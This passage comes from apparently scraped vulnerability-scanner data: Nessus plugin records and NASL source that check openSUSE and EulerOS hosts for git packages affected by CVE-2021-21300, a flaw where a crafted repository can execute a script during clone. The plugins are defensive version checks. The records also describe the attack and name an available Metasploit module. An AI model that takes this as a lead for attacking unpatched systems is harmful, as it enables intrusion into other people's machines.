value:\"p-cpe:/a:novell:opensuse:git-credential-gnome-keyring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-gnome-keyring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-libsecret\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-libsecret-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-arch-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-core-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-core-debuginfo-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-credential-gnome-keyring-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-credential-gnome-keyring-debuginfo-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-credential-libsecret-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-credential-libsecret-debuginfo-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-cvs-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-daemon-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-daemon-debuginfo-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-debuginfo-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-debugsource-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-email-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-gui-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-p4-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-svn-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-svn-debuginfo-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"git-web-2.26.2-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"gitk-2.26.2-lp152.2.6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git / git-arch / git-core / git-core-debuginfo / etc\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:48:16", "description": "According to the version of the git packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS,may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS,HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default,and is therefore vulnerable. The problem has been patched in the versions published on Tuesday,March 9th,2021. As a workaound,if symbolic link support is disabled in Git (e.g. via `git config\n --global core.symlinks false`),the described attack won't work. Likewise,if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning),the attack is foiled. As always,it is best to avoid cloning repositories from untrusted sources.(CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-18T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP8 : git (EulerOS-SA-2021-1870)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-08-30T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:git-core", "p-cpe:/a:huawei:euleros:git-core-doc", "p-cpe:/a:huawei:euleros:perl-Git", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-1870.NASL", "href": "https://www.tenable.com/plugins/nessus/149563", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149563);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/30\");\n\n script_cve_id(\n \"CVE-2021-21300\"\n );\n\n script_name(english:\"EulerOS 2.0 SP8 : git (EulerOS-SA-2021-1870)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the git packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - Git is an open-source distributed revision control\n system. In affected versions of Git a specially crafted\n repository that contains symbolic links as well as\n files using a clean/smudge filter such as Git LFS,may\n cause just-checked out script to be executed while\n cloning onto a case-insensitive file system such as\n NTFS,HFS+ or APFS (i.e. the default file systems on\n Windows and macOS). Note that clean/smudge filters have\n to be configured for that. Git for Windows configures\n Git LFS by default,and is therefore vulnerable. The\n problem has been patched in the versions published on\n Tuesday,March 9th,2021. As a workaound,if symbolic link\n support is disabled in Git (e.g. via `git config\n --global core.symlinks false`),the described attack\n won't work. Likewise,if no clean/smudge filters such as\n Git LFS are configured globally (i.e. _before_\n cloning),the attack is foiled. As always,it is best to\n avoid cloning repositories from untrusted\n sources.(CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1870\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fb7a9c4f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git-core-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(8)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-2.19.1-1.h9.eulerosv2r8\",\n \"git-core-2.19.1-1.h9.eulerosv2r8\",\n \"git-core-doc-2.19.1-1.h9.eulerosv2r8\",\n \"perl-Git-2.19.1-1.h9.eulerosv2r8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"8\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:49:10", "description": "According to the version of the git packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config\n --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources.(CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-18T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP5 : git (EulerOS-SA-2021-1897)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-08-30T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:git-core", "p-cpe:/a:huawei:euleros:git-core-doc", "p-cpe:/a:huawei:euleros:perl-Git", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-1897.NASL", "href": "https://www.tenable.com/plugins/nessus/149540", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149540);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/30\");\n\n script_cve_id(\n \"CVE-2021-21300\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : git (EulerOS-SA-2021-1897)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the git packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - Git is an open-source distributed revision control\n system. In affected versions of Git a specially crafted\n repository that contains symbolic links as well as\n files using a clean/smudge filter such as Git LFS, may\n cause just-checked out script to be executed while\n cloning onto a case-insensitive file system such as\n NTFS, HFS+ or APFS (i.e. the default file systems on\n Windows and macOS). Note that clean/smudge filters have\n to be configured for that. Git for Windows configures\n Git LFS by default, and is therefore vulnerable. The\n problem has been patched in the versions published on\n Tuesday, March 9th, 2021. As a workaound, if symbolic\n link support is disabled in Git (e.g. via `git config\n --global core.symlinks false`), the described attack\n won't work. Likewise, if no clean/smudge filters such\n as Git LFS are configured globally (i.e. _before_\n cloning), the attack is foiled. As always, it is best\n to avoid cloning repositories from untrusted\n sources.(CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1897\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?162c8579\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git-core-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-2.23.0-1.h7.eulerosv2r7\",\n \"git-core-2.23.0-1.h7.eulerosv2r7\",\n \"git-core-doc-2.23.0-1.h7.eulerosv2r7\",\n \"perl-Git-2.23.0-1.h7.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:49:29", "description": "According to the version of the git packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config\n --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources.\n The earliest impacted version is 2.14.2.(CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : git (EulerOS-SA-2021-1923)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-08-30T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:git-help", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-1923.NASL", "href": "https://www.tenable.com/plugins/nessus/150227", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150227);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/30\");\n\n script_cve_id(\n \"CVE-2021-21300\"\n );\n\n script_name(english:\"EulerOS 2.0 SP9 : git (EulerOS-SA-2021-1923)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the git packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - Git is an open-source distributed revision control\n system. In affected versions of Git a specially crafted\n repository that contains symbolic links as well as\n files using a clean/smudge filter such as Git LFS, may\n cause just-checked out script to be executed while\n cloning onto a case-insensitive file system such as\n NTFS, HFS+ or APFS (i.e. the default file systems on\n Windows and macOS). Note that clean/smudge filters have\n to be configured for that. Git for Windows configures\n Git LFS by default, and is therefore vulnerable. The\n problem has been patched in the versions published on\n Tuesday, March 9th, 2021. As a workaound, if symbolic\n link support is disabled in Git (e.g. via `git config\n --global core.symlinks false`), the described attack\n won't work. Likewise, if no clean/smudge filters such\n as Git LFS are configured globally (i.e. _before_\n cloning), the attack is foiled. As always, it is best\n to avoid cloning repositories from untrusted sources.\n The earliest impacted version is\n 2.14.2.(CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1923\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f044b62e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git-help\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 